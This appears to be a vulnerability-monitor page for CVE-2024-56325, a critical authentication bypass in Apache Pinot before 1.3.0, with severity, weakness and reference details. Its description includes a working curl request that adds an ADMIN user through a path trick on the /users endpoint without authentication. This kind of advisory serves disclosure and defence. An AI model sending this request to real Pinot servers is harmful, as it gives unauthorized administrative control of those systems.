Vulnerability Monitor

The vendors, products, and vulnerabilities you care about

CVE-2024-56325

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Published

2025-04-01T09:15:15.240

Last Modified

2025-07-15T19:49:46.407

Status

Analyzed

Source

[email protected]

Severity

CVSSv3.1: 9.8 (CRITICAL)

Weaknesses

Type: Secondary
CWE-288

Affected Vendors & Products

Type	Vendor	Product	Version/Range	Vulnerable?
Application	apache	pinot	< 1.3.0	Yes

References

https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v Mailing List, Vendor Advisory ([email protected])
http://www.openwall.com/lists/oss-security/2025/03/27/8 Mailing List, Third Party Advisory (af854a3a-2127-422b-91ae-364da2661108)